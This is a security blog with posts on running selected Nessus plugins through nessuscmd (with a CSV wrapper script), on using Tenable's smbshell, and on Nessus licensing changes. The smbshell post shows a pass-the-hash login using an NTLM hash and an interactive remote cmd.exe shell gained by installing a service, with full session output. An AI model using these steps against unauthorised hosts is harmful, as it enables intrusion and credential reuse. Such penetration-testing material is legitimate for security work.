
Tuesday, November 1, 2011

nessuscmd for scanning a host with a subset of plugins

Need to check a few specific Nessus plugins against a host without running the whole plugin set? nessuscmd takes a comma-separated list of plugin IDs with -i (and an optional port list with -p):

$ sudo ./nessuscmd 192.168.1.92 -p80,443 -v -V -i 38157,10107

Starting nessuscmd 4.4.0
Scanning '192.168.1.92'...

Host 192.168.1.92 is up

Discovered open port http (80/tcp) on 192.168.1.92

[i] Plugin 10107 reported a result on port http (80/tcp) of 192.168.1.92
[i] Plugin 38157 reported a result on port http (80/tcp) of 192.168.1.92

+ Results found on 192.168.1.92
+ - Port http (80/tcp) is open
[i] Plugin ID 38157 Synopsis :
The remote web server contains document sharing software
Description :
The remote web server is running SharePoint, a web interface for document management. As this interface is likely to contain sensitive information, make sure only authorized personnel can log into this site
See also : http://www.microsoft.com/Sharepoint/default.mspx

Solution : Make sure the proper access controls are put in place

Risk factor : None

Plugin output : The following instance of SharePoint was detected on the remote host :

Version : 12.0.0.6327
URL : http://192.168.1.92/

It looks like this functionality has been there for a while:
http://blog.tenablesecurity.com/2007/07/nessus-32-beta-.html
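As an added example (not code from the original post or from Tenable), here is a small POSIX shell wrapper that does the same thing for a list of hosts and reduces the verbose nessuscmd output to a host,plugin,port CSV. It assumes nessuscmd is at /opt/nessus/bin/nessuscmd (override with the NESSUSCMD environment variable) and is run one host at a time with the flags used above; the sample output embedded at the bottom is constructed from the run shown above so the parser can be exercised without a Nessus install.

```shell
#!/bin/sh
# Added example: run a subset of Nessus plugins against several hosts with
# nessuscmd and collect the hits as CSV (host,plugin,port).
# Assumptions (not from the original post): nessuscmd lives at
# /opt/nessus/bin/nessuscmd and is invoked one target at a time with the
# same flags the post uses (-v -V -i <plugins>, optionally -p <ports>).

NESSUSCMD="${NESSUSCMD:-/opt/nessus/bin/nessuscmd}"

# Reduce nessuscmd -v output on stdin to one "host,plugin,port" line per hit.
# It keys on the "[i] Plugin N reported a result on port name (N/proto) of HOST"
# lines, so the synopsis text that follows them is ignored.
parse_nessuscmd_output() {
    awk '
        /^\[i\] Plugin [0-9]+ reported a result on port / {
            plugin = $3            # numeric plugin ID
            port   = $(NF - 2)     # the "(80/tcp)" token, whatever the service name
            host   = $NF           # target address is always the last field
            gsub(/[()]/, "", port)
            print host "," plugin "," port
        }
    '
}

# Run the selected plugins against one host; PORTS (e.g. "80,443") is optional.
scan_host() {
    host="$1"; plugins="$2"
    if [ -n "${PORTS:-}" ]; then
        "$NESSUSCMD" "$host" -p"$PORTS" -v -V -i "$plugins"
    else
        "$NESSUSCMD" "$host" -v -V -i "$plugins"
    fi
}

# scan_hosts PLUGINS HOST... : scan each host in turn and print the hits as CSV.
scan_hosts() {
    plugins="$1"; shift
    printf 'host,plugin,port\n'
    for h in "$@"; do
        scan_host "$h" "$plugins" 2>/dev/null | parse_nessuscmd_output
    done
}

# Constructed sample: the lines nessuscmd 4.4.0 printed for 192.168.1.92 in the
# run above, kept here so the parser can be tried without a Nessus install.
SAMPLE_OUTPUT='Starting nessuscmd 4.4.0

Host 192.168.1.92 is up

Discovered open port http (80/tcp) on 192.168.1.92

[i] Plugin 10107 reported a result on port http (80/tcp) of 192.168.1.92
[i] Plugin 38157 reported a result on port http (80/tcp) of 192.168.1.92

+ Results found on 192.168.1.92
+ - Port http (80/tcp) is open
'

# Usage: PORTS=80,443 ./nessus-subset.sh 38157,10107 192.168.1.92 192.168.1.93
if [ "$#" -gt 0 ]; then
    scan_hosts "$@"
fi
```

Invoke it as `PORTS=80,443 ./nessus-subset.sh 38157,10107 192.168.1.92 192.168.1.93`; hosts that are down or produce no hits simply contribute no rows, and the full nessuscmd output is discarded in favour of the CSV.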

Tuesday, November 11, 2008

Passing the Hash and other fun with Tenable smbshell

Description

smbshell is a pre-compiled NASL script which can be used as a standalone tool to do the following tasks :
  • Navigate through the remote SMB shares and download files or obtain their version number
  • Read/Enumerate the remote SMB registry
  • Query/Start/Stop/Pause remote services
  • Obtain an interactive shell (cmd.exe) on the remote host
http://cgi.tenablesecurity.com/tenable/smbshell.php

Installation

smbshell is a pre-compiled NASL script - therefore, you need to install Nessus 3 first.
To run smbshell, download it and run it through the 'nasl' command-line utility :
$ /opt/nessus/bin/nasl -t TargetIP smbshell.nbin
Under Windows, you need to copy it under C:\Program Files\Tenable\Nessus\Plugins\Scripts\. Then you can do (the path contains a space, so quote it) :
C:\> "C:\Program Files\Tenable\Nessus\nasl.exe" -t TargetIP smbshell.nbin

Usage

cg@WPAD:~/evil/passthehashstuff$ /opt/nessus/bin/nasl -t 192.168.0.103 smbshell.nbin

--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--

[*] username: smbshell
[*] password:
[*] domain (optional):
[*] Connecting to 192.168.0.103...
[*] Authenticating to 192.168.0.103...

smbshell> help

The following commands are supported :

help - the current screen
ftp - SMB ftp client
reg - registry browser
users - SMB users & groups browser
services - service manager
quit/exit - exit

smbshell>

oh and shell, shell is fun

smbshell> shell
[*] Opening share ADMIN$...
[*] Connected to ADMIN$ (192.168.0.100:41095 -> 192.168.0.101:445)
[*] Installing remote command service...
[*] Remote command service installed.
[*] Connecting to remote command service...
[*] Connected to remote command service.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>echo woot
echo woot
woot

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Media State . . . . . . . . . . . : Media disconnected

Ethernet adapter Wireless Network Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1

C:\WINDOWS\system32>
C:\WINDOWS\system32>exit

[*] Removing remote command service...
[*] Remote command service removed.

Pass the Hash info
http://blog.tenablesecurity.com/2007/06/lmntlm-hash-sup.html

###########################################
--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--
[*] username: administrator
[*] password: **Just hit enter here**
[*] hash: NTLM:78164FD1E988FE5B39E0474EEE475E51
[*] domain (optional):
[*] Connecting to 172.11.12.184...
[*] Authenticating to 172.11.12.184...

If you have no idea what NASL is:
http://blog.tenablesecurity.com/2007/06/using-the-nasl-.html

Thanks to MC for bringing this up to me.

Lastly, if I see this shit in some "cutting edge hacker techniques" webcast without a mention of this post I'm gonna go off, because this has been out for over two years...I'll leave it at that.

Thursday, May 15, 2008

Changes to Nessus License Model

Nessus has changed its license model to essentially do away with the free version for anyone who scans networks (yeah yeah, there are exceptions). I won't get into greedy or not; as Martin McKeay said, "Tenable made a business decision that they need to collect revenue on their plugin feeds in order to continue providing the level of support they have always given. Some people are going to complain that Tenable is getting greedy; I'd counter that they just want to get paid for the work they've been supplying to the community for years."

For the most part I agree with that, and it is a smart decision by Tenable to look around, see that comparable VA scanners cost more, and decide they "might as well" charge too. But I do have to admit that, since there is no good tool that "does it all", it is getting mighty annoying to pay for multiple tools to get a job done.

A new, fully open source VA scanner like Nessus used to be is a long time coming, but I don't think anyone will step up to bat. The only reason to do it would be to make money, and why go up against Nessus?

But if anyone IS taking requests... a VA scanner where I can select specific checks, without running all the crap that runs for Nessus or the checks that require all the Nessus libraries, would be nice. A little command line jobby that you throw an IP range and a check at and it does the rest would be more than handy.

**update

pentestmonkey pointed me to OpenVAS...thanks!